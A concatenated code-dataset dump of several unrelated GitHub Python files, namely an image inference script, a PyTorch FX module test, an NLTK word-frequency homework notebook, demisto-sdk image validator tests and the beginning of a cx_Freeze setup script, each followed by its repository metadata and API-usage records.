print(\"Data processed\")\n\ndef process_image_set(folder):\n    \"process an image folder set\"\n    tmp_folder = Path(__file__).parent.parent / 'tmp'\n    rmtree(tmp_folder, ignore_errors=True)\n    tmp_folder.mkdir()\n    folders = sorted(folder.glob('*'))\n    if _PERF:\n        proc_st = time.process_time()\n        st_time = time.time()\n    for f in folders:\n        if f.is_dir():\n            print(f)\n            copytree(f, tmp_folder / f.name)\n            if _FILTER:\n                fil=tmp_folder / f.name / 'image0.png'\n                img = Image.open(fil)\n                img = addmask_to_picture(img)\n                img.save(fil)\n                for fil in ['image8.png','image9.png']:\n                    img = Image.open(tmp_folder / f.name / fil)\n                    img=addmask_to_picture(img, maskval=0)\n                    img.save(tmp_folder / f.name / fil)\n            # myoutfolder = tmp_folder / 'out'\n            # myoutfolder.mkdir()\n            process(tmp_folder / f.name)\n    if _PERF:\n        end_time = time.time()\n        proc_end = time.process_time()\n        print(\"CPU exec time:\", proc_end-proc_st, \"seconds\")\n        print(\"Elapsed time:\", end_time-st_time, \"seconds\")\n    print(\"Data processed\")\n\nif __name__=='__main__':\n    #process_testimage()\n    testset_folder = Path(__file__).parent.parent / 'testdata/testtarget'\n    testset_folder = Path(__file__).parent.parent / 'testdata/1cm_target_220830'\n    testset_folder = Path(__file__).parent.parent / 'testdata/test'\n    process_image_set(testset_folder)\n", "repo_name": "peterlholm/inference", "sub_path": "inference/process_input.py", "file_name": "process_input.py", "file_ext": "py", "file_size_in_byte": 5023, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.environ", "line_number": 18, "usage_type": "attribute"}, {"api_name": "numpy.pi", "line_number": 31, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 34, "usage_type": "call"}, {"api_name": "inference.config.L_MODEL_FILE", "line_number": 34, "usage_type": "argument"}, {"api_name": "tensorflow.keras", "line_number": 34, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.models.load_model", "line_number": 35, "usage_type": "call"}, {"api_name": "inference.config.H_MODEL_FILE", "line_number": 35, "usage_type": "argument"}, {"api_name": "tensorflow.keras", "line_number": 35, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 44, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 
44, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 45, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 55, "usage_type": "name"}, {"api_name": "cv2.imread", "line_number": 59, "usage_type": "call"}, {"api_name": "numpy.float32", "line_number": 59, "usage_type": "attribute"}, {"api_name": "inference.utils.make_grayscale", "line_number": 61, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 62, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 63, "usage_type": "call"}, {"api_name": "inference.masking.mask", "line_number": 65, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.logical_not", "line_number": 69, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 70, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 71, "usage_type": "call"}, {"api_name": "numpy.add", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.multiply", "line_number": 76, "usage_type": "call"}, {"api_name": "inference.config._DEBUG", "line_number": 77, "usage_type": "name"}, {"api_name": "cv2.imwrite", "line_number": 78, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 79, "usage_type": "call"}, {"api_name": "inference.depth.nn_depth", "line_number": 80, "usage_type": "call"}, {"api_name": "inference.pointcloud.nngenerate_pointcloud", "line_number": 81, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 87, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 88, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 89, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 90, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 94, "usage_type": "call"}, {"api_name": "time.time", "line_number": 95, "usage_type": "call"}, {"api_name": "time.time", "line_number": 98, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 99, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 106, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 107, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 111, "usage_type": "call"}, {"api_name": "time.time", "line_number": 112, "usage_type": "call"}, {"api_name": "shutil.copytree", "line_number": 116, "usage_type": "call"}, {"api_name": "PIL.Image.open", "line_number": 119, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 119, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 123, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 123, "usage_type": "name"}, {"api_name": "time.time", "line_number": 130, "usage_type": "call"}, {"api_name": "time.process_time", "line_number": 131, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 138, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 139, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 140, "usage_type": "call"}]} +{"seq_id": "74532279524", "text": "import torch\nimport torch.nn as nn\nimport torch.fx.experimental.optimization as optimization\n\nclass SimpleNet(torch.nn.Module):\n 
def __init__(self):\n        super(SimpleNet, self).__init__()\n        self.conv1 = torch.nn.Conv2d(64, 64, (3, 3), stride=(2, 2), padding=(1, 1), bias=False)\n        self.relu = nn.ReLU(inplace=True)\n        self.layer1 = nn.Sequential(torch.nn.Conv2d(64, 64, (3, 3), stride=(2, 2), padding=(1, 1), bias=False),\n                    torch.nn.Conv2d(64, 64, (3, 3), stride=(2, 2), padding=(1, 1), bias=False))\n\n    def forward(self, x):\n        y = self.relu(self.conv1(x))\n        y = self.layer1(y)\n        #print(\"y.size: {}\".format(y.size), flush=True)\n        return y\n\nclass LayerAffinityModule(torch.nn.Module):\n    def __init__(self, original_module):\n        super(LayerAffinityModule, self).__init__()\n        self.original_module = original_module\n        print(\"---------------finish create LayerAffinityModule--------\", flush=True)\n        print(\"---------------self.original_module.size()--------\", flush=True)\n        self.children_modules = []\n        for name, m in self.original_module.named_children():\n            print(name, '->', m, flush=True)\n            self.children_modules.append(m)\n        # for m in self.original_module.children():\n        #     self.children_modules.append(m)\n\n    def forward(self, *args, **kwargs):\n        # print(len(self.children_modules))\n        # for m in self.children_modules:\n        #     print(type(m), flush=True)\n        # return self.original_module(*args, **kwargs)\n        for idx in range(len(self.children_modules)):\n            print(\"self.children_modules[{0}]: is:{1}\".format(idx, self.children_modules[idx]))\n            if idx == 0:\n                res = self.children_modules[0](*args, **kwargs)\n            elif idx == 9:\n                res = torch.flatten(res, 1)\n                res = self.children_modules[idx](res)\n            else:\n                if type(res) is tuple:\n                    res = self.children_modules[idx](*res)\n                else:\n                    res = self.children_modules[idx](res)\n            print(\"------type(res) is:{}\".format(type(res)))\n            print(\"------res.size() is:{}\".format(res.size()))\n        return res\n\nif __name__ == \"__main__\":\n    model = SimpleNet().eval()\n    x = torch.rand(64, 64, 3, 3)\n\n    print(\"----model1----------\")\n    model(x)\n\n    print(\"----model2----------\")\n    model2 = LayerAffinityModule(model)\n    model2(x)\n\n    print(\"----FX_GRAPHModule----------\")\n    FX_GRAPHModule = optimization.fuse(model)\n    FX_GRAPHModule(x)\n\n    print(\"----FX_GRAPHModule Affinity----------\")\n    model4 = LayerAffinityModule(FX_GRAPHModule)\n    model4(x)\n\n    print(\"----------finish test-------------\", flush=True)", "repo_name": "leslie-fang-intel/torch_script", "sub_path": "fx_mixed_affinity/main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2778, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.nn", "line_number": 5, "usage_type": "attribute"}, {"api_name": "torch.nn.Conv2d", "line_number": 8, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.nn.ReLU", "line_number": 9, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 9, "usage_type": "name"}, {"api_name": "torch.nn.Sequential", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 10, "usage_type": "name"}, {"api_name": "torch.nn.Conv2d", "line_number": 10, "usage_type": "call"}, {"api_name": "torch.nn.Conv2d", "line_number": 11, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 11, "usage_type": "attribute"}, {"api_name": "torch.nn", "line_number": 19, "usage_type": "attribute"}, {"api_name": "torch.flatten", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.rand", "line_number": 55, "usage_type": "call"}, {"api_name": 
"torch.fx.experimental.optimization.fuse", "line_number": 65, "usage_type": "call"}, {"api_name": "torch.fx.experimental.optimization", "line_number": 65, "usage_type": "name"}]} +{"seq_id": "15051414781", "text": "#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\n\nimport nltk\nfrom nltk.corpus import PlaintextCorpusReader\nfrom nltk . corpus import stopwords\nfrom nltk import FreqDist\nfrom nltk.collocations import *\nfrom nltk . stem import WordNetLemmatizer\nimport xlwt\n\n\n# In[2]:\n\n\n#open file_1\ncorpus_root = '/Users/lc/Desktop/CIS 668/HW/hw1'\nwordlists = PlaintextCorpusReader(corpus_root,'.*')\n\n\n# In[3]:\n\n\n#tokenizing\nwordlist1 = wordlists.words(fileids = 'state_union_part1.txt')\n\n\n# In[4]:\n\n\n#remove len(words) < 2\nwordlist1 = [ w for w in wordlist1 if len(w) > 2]\n\n\n# In[5]:\n\n\n#translate into low case format\nwordlist1 = [ w.lower() for w in wordlist1 if w.isalpha()]\n\n\n# In[6]:\n\n\n#removing meaningless stop words\nstopwordSet = set(stopwords.words('english'))\nwordlist1 = [ w for w in wordlist1 if w not in stopwordSet]\n\n\n# In[7]:\n\n\n#lemmatizatio\nwordlist1 = [ WordNetLemmatizer ().lemmatize(w) for w in wordlist1]\n\n\n# In[8]:\n\n\nfreWords1 = FreqDist(wordlist1)\nwordlist1_freq = freWords1.most_common(50)\n# wordlist1_freq\n\n\n# In[9]:\n\n\nbigram_measures = nltk.collocations.BigramAssocMeasures()\nfinder1 = BigramCollocationFinder.from_words(wordlist1)\nbigram1_freq = finder1.score_ngrams(bigram_measures.raw_freq)\nbigram1_freq = bigram1_freq[:50]\n\n\n# In[10]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[ ]:\n\n\n\n\n\n# In[11]:\n\n\nwordlist2 = wordlists.words(fileids = 'state_union_part2.txt')\nwordlist2 = [ w.lower() for w in wordlist2 if w.isalpha()]\nwordlist2 = [ w for w in wordlist2 if len(w) > 2]\nwordlist2 = [ w for w in wordlist2 if w not in stopwordSet]\nwordlist2 = [ WordNetLemmatizer ().lemmatize(w) for w in wordlist2]\n\n\n# In[12]:\n\n\nfreWords = FreqDist(wordlist2)\nwordlist2_freq = freWords.most_common(50)\n# wordlist2_freq\n\n\n# In[42]:\n\n\nfinder2 = BigramCollocationFinder.from_words(wordlist2)\nbigram2_freq = finder2.score_ngrams(bigram_measures.raw_freq)\nbigram2_freq = bigram2_freq[:50]\nbigram2_freq\n\n\n# In[14]:\n\n\nfinder2. 
apply_freq_filter(5)\nbigram2_pmi = finder2.score_ngrams(bigram_measures.pmi)\nbigram2_pmi = bigram2_pmi[:50]\n\n\n# In[16]:\n\n\nworkbook1 = xlwt.Workbook(encoding='utf-8') \nsheet1 = workbook1.add_sheet(\"wordlist1_freq\",cell_overwrite_ok=True) \nfor i in range(len(wordlist1_freq)):\n    sheet1.write(i,0,wordlist1_freq[i][0])\n    sheet1.write(i,1,wordlist1_freq[i][1])\nworkbook1.save('/Users/lc/Desktop/CIS 668/HW/hw1/wordlist1_freq.xls') \n\n\n# In[17]:\n\n\nworkbook2 = xlwt.Workbook(encoding='utf-8') \nsheet2 = workbook2.add_sheet(\"wordlist2_freq\",cell_overwrite_ok=True) \nfor i in range(len(wordlist2_freq)):\n    sheet2.write(i,0,wordlist2_freq[i][0])\n    sheet2.write(i,1,wordlist2_freq[i][1])\nworkbook2.save('/Users/lc/Desktop/CIS 668/HW/hw1/wordlist2_freq.xls') \n\n\n# In[18]:\n\n\nworkbook3 = xlwt.Workbook(encoding='utf-8') \nsheet3 = workbook3.add_sheet(\"bigram1_freq\",cell_overwrite_ok=True) \nfor i in range(len(bigram1_freq)):\n    sheet3.write(i,0,bigram1_freq[i][0][0])\n    sheet3.write(i,1,bigram1_freq[i][0][1])\nworkbook3.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram1_freq.xls') \n\n\n# In[19]:\n\n\nworkbook4 = xlwt.Workbook(encoding='utf-8') \nsheet4 = workbook4.add_sheet(\"bigram2_freq\",cell_overwrite_ok=True) \nfor i in range(len(bigram2_freq)):\n    sheet4.write(i,0,bigram2_freq[i][0][0])\n    sheet4.write(i,1,bigram2_freq[i][0][1])\nworkbook4.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram2_freq.xls') \n\n\n# In[20]:\n\n\nworkbook5 = xlwt.Workbook(encoding='utf-8') \nsheet5 = workbook5.add_sheet(\"bigram1_pmi\",cell_overwrite_ok=True) \nfor i in range(len(bigram1_pmi)):\n    sheet5.write(i,0,bigram1_pmi[i][0][0])\n    sheet5.write(i,1,bigram1_pmi[i][0][1])\nworkbook5.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram1_pmi.xls') \n\n\n# In[21]:\n\n\nworkbook6 = xlwt.Workbook(encoding='utf-8') \nsheet6 = workbook6.add_sheet(\"bigram2_pmi\",cell_overwrite_ok=True) \nfor i in range(len(bigram2_pmi)):\n    sheet6.write(i,0,bigram2_pmi[i][0][0])\n    sheet6.write(i,1,bigram2_pmi[i][0][1])\nworkbook6.save('/Users/lc/Desktop/CIS 668/HW/hw1/bigram2_pmi.xls') \n\n\n# In[28]:\n\n\nlist1 = [ pair[0] for pair in wordlist1_freq]\nlist2 = [ pair[0] for pair in wordlist2_freq]\nfreq_same = list(set(list1)&set(list2))\nfreq_same\n\n\n# In[29]:\n\n\nlist1_diff = list(set(list1)-set(freq_same))\nlist1_diff\n\n\n# In[31]:\n\n\nlist2_diff = list(set(list2)-set(freq_same))\nlist2_diff\n\n\n# In[32]:\n\n\nprint(len(freq_same),len(list1_diff),len(list2_diff))\n\n\n# In[53]:\n\n\nlist1 = [ pair[0] for pair in bigram1_freq]\nlist2 = [ pair[0] for pair in bigram2_freq]\nbgrFreq_same = list(set(list1)&set(list2)) \nprint(bgrFreq_same)\nprint(len(bgrFreq_same))\n\n\n# In[56]:\n\n\n# list1_diff = list(set(list1)-set(bgrFreq_same))\n# list2_diff = list(set(list2)-set(bgrFreq_same))\n# print(list1_diff)\n# print(list2_diff)\n\n\n# In[57]:\n\n\nlist1 = [ pair[0] for pair in bigram1_pmi]\nlist2 = [ pair[0] for pair in bigram2_pmi]\nbgrPmi_same = list(set(list1)&set(list2)) \nprint(bgrPmi_same)\nprint(len(bgrPmi_same))\n\n\n# In[ ]:\n\n\n\n\n", "repo_name": "heyheyhey2020/CIS668_NLP_HW", "sub_path": "Address word analysis.py", "file_name": "Address word analysis.py", "file_ext": "py", "file_size_in_byte": 4915, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "nltk.corpus.PlaintextCorpusReader", "line_number": 21, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 49, 
"usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 49, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 57, "usage_type": "call"}, {"api_name": "nltk.FreqDist", "line_number": 63, "usage_type": "call"}, {"api_name": "nltk.collocations.BigramAssocMeasures", "line_number": 71, "usage_type": "call"}, {"api_name": "nltk.collocations", "line_number": 71, "usage_type": "attribute"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 108, "usage_type": "call"}, {"api_name": "nltk.FreqDist", "line_number": 114, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 139, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 151, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 163, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 175, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 187, "usage_type": "call"}, {"api_name": "xlwt.Workbook", "line_number": 199, "usage_type": "call"}]} +{"seq_id": "21451898561", "text": "import os\nfrom pathlib import Path\n\nimport pytest\n\nfrom demisto_sdk.commands.common.handlers import DEFAULT_JSON_HANDLER as json\nfrom demisto_sdk.commands.common.hook_validations import image\nfrom demisto_sdk.commands.common.hook_validations.integration import (\n IntegrationValidator,\n)\nfrom demisto_sdk.commands.common.legacy_git_tools import git_path\nfrom demisto_sdk.commands.common.tests.integration_test import mock_structure\nfrom TestSuite.file import File\nfrom TestSuite.test_tools import ChangeCWD\n\n\ndef test_is_not_default_image():\n int_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"integration-Zoom.yml\",\n )\n )\n image_validator = image.ImageValidator(int_path)\n assert image_validator.is_not_default_image() is False\n\n image_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"default_image.png\",\n )\n )\n image_validator = image.ImageValidator(image_path)\n assert image_validator.is_not_default_image() is False\n\n image_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/commands/init/templates\",\n \"HelloWorld\",\n \"HelloWorld_image.png\",\n )\n )\n image_validator = image.ImageValidator(image_path)\n assert image_validator.is_not_default_image() is False\n\n int_path = os.path.normpath(\n os.path.join(\n __file__,\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"fake_integration.yml\",\n )\n )\n image_validator = image.ImageValidator(int_path)\n assert image_validator.is_not_default_image() is False\n\n\ndef test_is_valid_image_positive(monkeypatch):\n \"\"\"\n Given\n - An integration is with a valid non default image\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered valid\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"not_default_image_integration-Zoom.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n # Adding monkey patching this will make image validator behave like this is an integration outside of\n # pack context and ignore the image that's in the same folder as the file\n monkeypatch.setattr(\n \"demisto_sdk.commands.common.hook_validations.image.PACKS_INTEGRATION_NON_SPLIT_YML_REGEX\",\n integration_path,\n )\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is 
True\n\n\ndef test_image_in_both_yml_and_directory(monkeypatch):\n \"\"\"\n Given\n - An integration that has image in both yml file and in the yml directory\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered non-valid\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"not_default_image_integration-Zoom.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is False\n\n\ndef test_image_when_invalid_type(monkeypatch):\n \"\"\"\n Given\n - An integration that has an invalid image\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered non-valid.\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"not_default_image_integration-Zoom.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is False\n\n\ndef test_no_image_integration(monkeypatch):\n \"\"\"\n Given\n - A new integration yml that does not have an image in its pack\n\n When\n - Validating this integration\n\n Then\n - Ensure integration is considered non-valid.\n \"\"\"\n integration_path = os.path.normpath(\n os.path.join(\n f\"{git_path()}/demisto_sdk/tests\",\n \"test_files\",\n \"DummyPack\",\n \"Integrations\",\n \"integration-DummyIntegration.yml\",\n )\n )\n structure = mock_structure(file_path=integration_path)\n validator = IntegrationValidator(structure)\n assert validator.is_valid_image() is False\n\n\ndef test_json_outputs_where_no_image_in_integration(repo):\n \"\"\"\n Given\n - An integration without an existing image\n - A json file for writing the outputs\n\n When\n - Validating the image integration\n\n Then\n - Ensure that the outputs are correct.\n \"\"\"\n # Create pack and integration\n pack = repo.create_pack(\"PackName\")\n integration = pack.create_integration(\"IntName\")\n integration.create_default_integration()\n\n # Remove the integration image\n image_path = os.path.join(integration.path, \"IntName_image.png\")\n Path(image_path).unlink(missing_ok=True)\n\n with ChangeCWD(repo.path):\n # Run the image validator with a json file path\n json_file_path = os.path.join(integration.path, \"json_outputs.json\")\n image_validator = image.ImageValidator(\n integration.yml.path, json_file_path=json_file_path\n )\n\n # Check the outputs in the json file\n with open(image_validator.json_file_path) as r:\n json_outputs = json.loads(r.read())\n\n assert json_outputs[0][\"filePath\"] == image_path\n assert json_outputs[0][\"fileType\"] == \"png\"\n assert json_outputs[0][\"entityType\"] == \"image\"\n\n\ndef test_is_valid_image_name_with_valid_name(repo):\n \"\"\"\n Given\n - An integration image with a valid name\n\n When\n - Validating the integration image name\n\n Then\n - Ensure that image validator for integration passes.\n \"\"\"\n\n pack = repo.create_pack(\"PackName\")\n\n integration = pack.create_integration(\"IntName\")\n integration.create_default_integration()\n\n image_validator = image.ImageValidator(integration.yml.path)\n\n assert image_validator.is_valid_image_name()\n\n\n@pytest.mark.parametrize(\"file_name\", [\"IntName_img.png\", \"IntNameTest_image.png\"])\ndef test_is_valid_image_name_with_invalid_name(repo, file_name):\n \"\"\"\n Given\n - An integration image with invalid name (different 
from the folder name containing it)\n - An integration image with invalid name - invalid suffix (_img instead of _image)\n\n When\n - Validating the integration image name\n\n Then\n - Ensure that image validator for the integration failed in both cases.\n \"\"\"\n\n pack = repo.create_pack(\"PackName\")\n\n integration = pack.create_integration(\"IntName\")\n integration.create_default_integration()\n\n if Path(integration.image.path).exists():\n Path(integration.image.path).unlink()\n integration.image = None\n\n integration.image = File(\n integration._tmpdir_integration_path / f\"{file_name}\", integration._repo.path\n )\n\n with ChangeCWD(repo.path):\n\n image_validator = image.ImageValidator(integration.image.path)\n\n assert not image_validator.is_valid_image_name()\n", "repo_name": "demisto/demisto-sdk", "sub_path": "demisto_sdk/commands/common/tests/image_test.py", "file_name": "image_test.py", "file_ext": "py", "file_size_in_byte": 7474, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 64, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.normpath", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path", "line_number": 18, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 19, "usage_type": "call"}, {"api_name": "os.path", "line_number": 19, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 21, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 26, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 26, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path", "line_number": 30, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 32, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 37, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 37, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 40, "usage_type": "call"}, {"api_name": "os.path", "line_number": 40, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path", "line_number": 41, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 43, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 48, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 48, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 51, "usage_type": "call"}, {"api_name": "os.path", "line_number": 51, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 52, "usage_type": "call"}, {"api_name": "os.path", "line_number": 52, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 54, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 59, "usage_type": "call"}, {"api_name": 
"demisto_sdk.commands.common.hook_validations.image", "line_number": 59, "usage_type": "name"}, {"api_name": "os.path.normpath", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 75, "usage_type": "call"}, {"api_name": "os.path", "line_number": 75, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 76, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 81, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 103, "usage_type": "call"}, {"api_name": "os.path", "line_number": 103, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 104, "usage_type": "call"}, {"api_name": "os.path", "line_number": 104, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 105, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 110, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 126, "usage_type": "call"}, {"api_name": "os.path", "line_number": 126, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 127, "usage_type": "call"}, {"api_name": "os.path", "line_number": 127, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 128, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 133, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 134, "usage_type": "call"}, {"api_name": "os.path.normpath", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path", "line_number": 149, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 150, "usage_type": "call"}, {"api_name": "os.path", "line_number": 150, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.legacy_git_tools.git_path", "line_number": 151, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.tests.integration_test.mock_structure", "line_number": 158, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.integration.IntegrationValidator", "line_number": 159, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "pathlib.Path", "line_number": 182, "usage_type": "call"}, {"api_name": "TestSuite.test_tools.ChangeCWD", "line_number": 184, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 186, "usage_type": "call"}, {"api_name": "os.path", "line_number": 186, "usage_type": "attribute"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 187, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 187, "usage_type": "name"}, {"api_name": "demisto_sdk.commands.common.handlers.DEFAULT_JSON_HANDLER.loads", "line_number": 193, 
"usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.handlers.DEFAULT_JSON_HANDLER", "line_number": 193, "usage_type": "name"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 217, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 217, "usage_type": "name"}, {"api_name": "pathlib.Path", "line_number": 241, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 242, "usage_type": "call"}, {"api_name": "TestSuite.file.File", "line_number": 245, "usage_type": "call"}, {"api_name": "TestSuite.test_tools.ChangeCWD", "line_number": 249, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image.ImageValidator", "line_number": 251, "usage_type": "call"}, {"api_name": "demisto_sdk.commands.common.hook_validations.image", "line_number": 251, "usage_type": "name"}, {"api_name": "pytest.mark.parametrize", "line_number": 222, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 222, "usage_type": "attribute"}]} +{"seq_id": "1593239871", "text": "#!/usr/bin/env python\n\nimport os\nimport re\nimport sys\n\nfrom setuptools import find_packages, setup\nfrom cx_Freeze import setup, Executable # noqa re-import setup\n\nfrom stressor import __version__\n\n\n# Check for Windows MSI Setup\nif \"bdist_msi\" not in sys.argv: # or len(sys.argv) != 2:\n raise RuntimeError(\n \"This setup.py variant is only for creating 'bdist_msi' targets: {}\\n\"\n \"Example `{} bdist_msi`\".format(sys.argv, sys.argv[0])\n )\n\norg_version = __version__\n\n# 'setup.py upload' fails on Vista, because .pypirc is searched on 